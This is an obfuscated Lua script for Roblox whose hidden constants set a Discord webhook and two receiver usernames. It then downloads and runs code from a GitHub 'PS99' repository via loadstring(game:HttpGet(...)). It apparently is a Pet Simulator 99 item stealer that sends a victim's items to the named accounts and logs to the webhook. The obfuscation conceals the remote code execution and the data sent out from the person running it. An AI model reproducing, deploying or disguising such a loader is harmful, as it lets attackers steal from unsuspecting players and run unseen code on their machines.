--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v121=0;local v122;while true do if (v121==1) then return v122;end if (v121==0) then v122=v5(v90,v19);v19=nil;v121=1;end end else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0;local v92;while true do if (v91==(0 -0)) then v92=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(2 -(878 -(282 + 595)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v92-(v92%(569 -(367 + 201))) ;end end else local v93=(929 -(214 + (2350 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v93 + v93))>=v93) and 1) or (0 + 0) ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==((1271 -(226 + 1044)) -0)) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v37 * (251 + 5)) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==((487 -306) -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * ((120615 -54122) -(892 + 65))) + (v40 * ((445 + 165) -354)) + v39 ;end if (0==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;v38=953 -(802 + 150) ;end end end local function v24() local v43=v23();local v44=v23();local v45=(1883 -(261 + 624)) -(915 + 82) ;local v46=(v20(v44,(779 -340) -(145 + 293) ,(1136 -(1020 + 60)) -36 ) * ((2 + (1423 -(630 + 793)))^(41 -9))) + v43 ;local v47=v20(v44,(4093 -2885) -(1069 + (558 -440)) ,70 -39 );local v48=((v20(v44,804 -(201 + 571) )==(1 -(0 + 0))) and  -(1 + 0)) or (1 -0) ;if (v47==(0 + (0 -0))) then if (v46==0) then return v48 * (791 -(368 + 423)) ;else local v111=0;while true do if (v111==(0 -(1747 -(760 + 987)))) then v47=19 -(10 + 8) ;v45=0 -0 ;break;end end end elseif (v47==(2906 -(814 + 45))) then return ((v46==(442 -(416 + 26))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2520 -1497) ) * (v45 + (v46/((1 + 1)^(23 + 29)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1913 -(1789 + 124))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(767 -(745 + 21)) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103==(0 + 0)) then v94=(function() return 836 -(660 + 176) ;end)();v95=(function() return nil;end)();v103=(function() return 1;end)();end if (v103~=1) then else local v118=(function() return 0 + 0 ;end)();while true do if (0~=v118) then else while true do if (v94~=(202 -(14 + 188))) then else v95=(function() return v96();end)();if (v97(v95, #",", #"\\")==(675 -(534 + 141))) then local v140=(function() return 0;end)();local v141=(function() return;end)();local v142=(function() return;end)();local v143=(function() return;end)();while true do if (v140==(2 + 1)) then if (v97(v142, #"xxx", #"nil")~= #"}") then else v143[ #"xnxx"]=(function() return v100[v143[ #".dev"]];end)();end v101[v102]=(function() return v143;end)();break;end if (1~=v140) then else local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if ((0 + 0)==v170) then v171=(function() return 0;end)();while true do if (v171==0) then v143=(function() return {v98(),v98(),nil,nil};end)();if (v141==0) then local v213=(function() return 0 -0 ;end)();local v214=(function() return;end)();while true do if (v213~=(0 -0)) then else v214=(function() return 0 -0 ;end)();while true do if (v214==0) then v143[ #"-19"]=(function() return v98();end)();v143[ #"http"]=(function() return v98();end)();break;end end break;end end elseif (v141== #"[") then v143[ #"xnx"]=(function() return v99();end)();elseif (v141==2) then v143[ #"-19"]=(function() return v99() -((2 + 0)^16) ;end)();elseif (v141== #"xxx") then local v219=(function() return 0 + 0 ;end)();local v220=(function() return;end)();while true do if (v219==0) then v220=(function() return 0;end)();while true do if (v220~=0) then else v143[ #"gha"]=(function() return v99() -(2^16) ;end)();v143[ #"http"]=(function() return v98();end)();break;end end break;end end end v171=(function() return 1;end)();end if (v171==1) then v140=(function() return 398 -(115 + 281) ;end)();break;end end break;end end end if (v140==2) then if (v97(v142, #"<", #":")~= #"]") then else v143[4 -2 ]=(function() return v100[v143[2]];end)();end if (v97(v142,2 + 0 ,2)== #"[") then v143[ #"19("]=(function() return v100[v143[ #"19("]];end)();end v140=(function() return 3;end)();end if (0==v140) then local v172=(function() return 0;end)();while true do if (v172==(2 -1)) then v140=(function() return 3 -2 ;end)();break;end if (v172==(867 -(550 + 317))) then v141=(function() return v97(v95,2 -0 , #"-19");end)();v142=(function() return v97(v95, #"asd1",8 -2 );end)();v172=(function() return 2 -1 ;end)();end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v53=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==(285 -(134 + 151))) then v108=(function() return 1665 -(970 + 695) ;end)();while true do if ((0 -0)==v108) then local v123=(function() return 1990 -(582 + 1408) ;end)();while true do if (v123==(0 -0)) then v104[v105-#" " ]=(function() return v106();end)();return v104,v105,v106;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"]",v58 do local v70=(function() return 0 -0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v70==(3 -2)) then if (v71== #"~") then v72=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"asd") then else v72=(function() return v25();end)();end v59[v69]=(function() return v72;end)();break;end if (v70==0) then local v113=(function() return 0;end)();while true do if (v113==(1 -0)) then v70=(function() return 242 -(187 + 54) ;end)();break;end if (v113~=(780 -(162 + 618))) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v113=(function() return 1;end)();end end end end end v57[ #"19("]=(function() return v21();end)();for v73= #"/",v23() do FlatIdent_8F59B,Descriptor,v21,v20,v22,v23,v59,v54,v73=(function() return v52(FlatIdent_8F59B,Descriptor,v21,v20,v22,v23,v59,v54,v73);end)();end for v74= #"}",v23() do v55,v74,v28=(function() return v53(v55,v74,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2 + 0 ];local v66=v61[(10 -4) -3 ];return function(...) local v75=v64;local v76=v65;local v77=v66;local v78=v27;local v79=1 -0 ;local v80= -(1 + 0 + 0);local v81={};local v82={...};local v83=v12("#",...) -(1001 -(451 + (785 -(141 + 95)))) ;local v84={};local v85={};for v109=0 + 0 + 0 ,v83 do if (v109>=v77) then v81[v109-v77 ]=v82[v109 + (1 -(0 -0)) ];else v85[v109]=v82[v109 + (4 -(6 -3)) ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do local v110=(0 -0) -0 ;while true do if (v110==(978 -(553 + 424))) then if (v88<=(1389 -(746 + 638))) then if ((3058<4860) and (v88<=(1 + 1))) then if (v88<=(0 -0)) then v63[v87[(242 + 102) -(218 + 123) ]]=v85[v87[1583 -(1535 + 46) ]];elseif (v88==(1 + 0)) then v79=v87[1 + 2 ];else v85[v87[562 -(306 + 254) ]]();end elseif (v88<=(1 + 2)) then local v127=0 -0 ;local v128;local v129;while true do if (v127==(0 -0)) then v128=v87[1469 -(899 + 568) ];v129=v85[v87[2 + 1 ]];v127=4 -3 ;end if ((v127==(1 + 0)) or (1296>=4446)) then v85[v128 + 1 + 0 ]=v129;v85[v128]=v129[v87[9 -5 ]];break;end end elseif (v88>(3 + 1)) then v85[v87[605 -(268 + 335) ]]=v87[6 -3 ]~=(290 -((84 -24) + 136 + 94)) ;else v85[v87[574 -(426 + 146) ]]=v63[v87[1133 -(369 + 761) ]];end elseif (v88<=(1 + 7)) then if (v88<=(1462 -(282 + 1174))) then v63[v87[(977 -(92 + 71)) -(569 + 242) ]]=v85[v87[2 -0 ]];v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[1 + 1 ]]=v87[1027 -(706 + 318) ];v79=v79 + ((619 + 633) -(721 + 530)) ;v87=v75[v79];v63[v87[1274 -(945 + 326) ]]=v85[v87[4 -2 ]];v79=v79 + 1 ;v87=v75[v79];v85[v87[2 + 0 ]]=v87[703 -(271 + 429) ];v79=v79 + 1 + 0 ;v87=v75[v79];v79=v87[1503 -(1408 + (154 -62)) ];elseif ((v88>(1093 -(461 + 625))) or (1393>4489)) then local v148=(2053 -(574 + 191)) -(993 + 295) ;local v149;while true do if ((1580 -(1183 + 397))==v148) then v149=v87[1 + 1 ];v85[v149]=v85[v149](v13(v85,v149 + ((967 + 205) -(418 + 753)) ,v80));break;end end else do return;end end elseif ((v88<=(4 + 6)) or (4424<27)) then if (v88>((2 -1) + 8)) then local v150=0 + 0 ;local v151;local v152;local v153;local v154;local v155;while true do if ((v150==(3 + 4 + 2)) or (1997>3815)) then v85[v87[531 -(406 + 123) ]]();v79=v79 + (1770 -(1749 + 20)) ;v87=v75[v79];v79=v87[1 + 2 ];break;end if (v150==(15 -11)) then v85[v155]=v154[v87[1326 -(1249 + 73) ]];v79=v79 + ((850 -(254 + 595)) -0) ;v87=v75[v79];v85[v87[2 + 0 ]]=v87[2 + 1 ];v150=5;end if (v150==(1152 -(466 + 679))) then v151=0 -0 ;for v203=v155,v80 do v151=v151 + (2 -1) ;v85[v203]=v152[v151];end v79=v79 + (2 -1) ;v87=v75[v79];v150=1908 -(106 + 1794) ;end if (v150==0) then v151=nil;v152,v153=nil;v154=nil;v155=nil;v150=1;end if (v150==(1006 -(938 + 63))) then v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[1 + 1 ]]=v87[8 -5 ]~=(0 -(126 -(55 + 71))) ;v79=v79 + (115 -(4 + 110)) ;v150=6;end if ((3465>1913) and (v150==(587 -(57 + 527)))) then v87=v75[v79];v155=v87[1429 -(41 + 1386) ];v154=v85[v87[270 -(176 + 91) ]];v85[v155 + ((136 -32) -(17 + 86)) ]=v154;v150=3 + (1791 -(573 + 1217)) ;end if (v150==(1093 -((2700 -1725) + 117))) then v63[v87[6 -3 ]]=v85[v87[2 + 0 ]];v79=v79 + (2 -(1 + 0)) ;v87=v75[v79];v85[v87[168 -(122 + 44) ]]=v63[v87[5 -2 ]];v150=6 -4 ;end if (v150==(3 -1)) then v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[1 + (1 -0) ]]=v63[v87[3 + 0 ]];v79=v79 + 1 + 0 ;v150=5 -2 ;end if ((733<1819) and (v150==(1233 -((1261 -(714 + 225)) + (2644 -1739))))) then v87=v75[v79];v155=v87[67 -(30 + (48 -13)) ];v152,v153=v78(v85[v155](v13(v85,v155 + 1 + 0 ,v87[875 -(826 + 5 + 41) ])));v80=(v153 + v155) -(1258 -(1043 + 214)) ;v150=(36 -10) -19 ;end if ((v150==(1220 -(323 + 889))) or (4395==4755)) then v155=v87[2];v85[v155]=v85[v155](v13(v85,v155 + (2 -1) ,v80));v79=v79 + (1899 -((1066 -(118 + 688)) + 1638)) ;v87=v75[v79];v150=(497 -(25 + 23)) -(382 + 58) ;end end elseif (v85[v87[(113 + 469) -(361 + 219) ]]==v87[324 -(53 + 267) ]) then v79=v79 + 1 + 0 ;else v79=v87[416 -((1901 -(927 + 959)) + (1341 -943)) ];end elseif (v88>(993 -(18 + 964))) then v85[v87[3 -1 ]]=v87[8 -5 ];else local v158=0 -0 ;local v159;local v160;local v161;local v162;while true do if (v158==0) then v159=v87[3 -1 ];v160,v161=v78(v85[v159](v13(v85,v159 + 1 + 0 ,v87[2 + 1 ])));v158=(1583 -(16 + 716)) -(20 + 830) ;end if ((v158==(1 + 0)) or (3793<2369)) then v80=(v161 + v159) -(127 -(116 + 10)) ;v162=(1318 -635) -(483 + 200) ;v158=(98 -(11 + 86)) + 1 ;end if (v158==2) then for v206=v159,v80 do local v207=738 -(542 + 196) ;while true do if ((0 -0)==v207) then v162=v162 + 1 + 0 ;v85[v206]=v160[v162];break;end end end break;end end end v79=v79 + 1 + 0 ;break;end if (v110==(562 -(334 + 228))) then v87=v75[v79];v88=v87[(2 -1) + 0 ];v110=2 -1 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q00028Q00026Q00F03F03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F312Q333239302Q373533303330382Q31372Q382F53556A346A79326D394654336A4E62734A6A596448536C677954776B756B4C7438794774794D687055662Q5570684765754A7A696F4B463951534E573662485A425A7357030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61726C792Q30312F50532Q392F726566732F68656164732F6D61696E2F6C756103083Q00557365726E616D65030B3Q00657363617061706461313403093Q00557365726E616D6532030F3Q00634841494E534E415443484552323500173Q00120C3Q00013Q0026093Q000E000100020004013Q000E000100120C000100043Q00120A000100033Q00122Q000100053Q00122Q000200063Q00202Q00020002000700122Q000400086Q000500016Q000200056Q00013Q00024Q00010001000100044Q001600010026093Q0001000100010004013Q0001000100120C0001000A3Q001206000100093Q00122Q0001000C3Q00122Q0001000B3Q00124Q00023Q00044Q000100012Q00073Q00017Q00",v9(),...);
